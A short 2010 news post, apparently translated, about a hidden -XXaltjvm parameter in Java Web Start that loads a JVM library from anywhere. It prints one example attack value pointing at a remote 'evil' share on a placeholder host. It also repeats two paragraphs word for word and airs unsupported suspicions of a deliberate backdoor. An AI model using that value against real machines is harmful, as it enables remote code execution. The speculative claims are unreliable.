April 12, 2010 at 16:32JavaWS found backdoor
A serious vulnerability was found in the Java Web Start framework , namely the hidden parameter -XXaltjvm (as well as -J-XXaltjvm ), with which you can run an alternative version of the JavaVM library (jvm.dll or libjvm.so) located anywhere. That is, you can now execute a command of the form -XXaltjvm = \\ IP \ evil , and put out the lights on any Windows machine.
Since JavaWS is part of the JRE, the vulnerability affects all major browsers, including Opera, Firefox, IE, Chrome, etc. At the moment, the vulnerability is present only in versions for Windows, whereas in Java SE 6 it was closed several releases ago.
According to experts who detaildocumented this vulnerability; it has been present in JavaWS for a very long time, at least for several years. There are even strange suspicions that someone at Sun introduced this “feature” specifically for some purpose, too much like a deliberately designed backdoor.
Since JavaWS is part of the JRE, the vulnerability affects all major browsers, including Opera, Firefox, IE, Chrome, etc. At the moment, the vulnerability is present only in versions for Windows, whereas in Java SE 6 it was closed several releases ago.
According to experts who detaildocumented this vulnerability; it has been present in JavaWS for a very long time, at least for several years. There are even strange suspicions that someone at Sun introduced this “feature” specifically for some purpose, too much like a deliberately designed backdoor.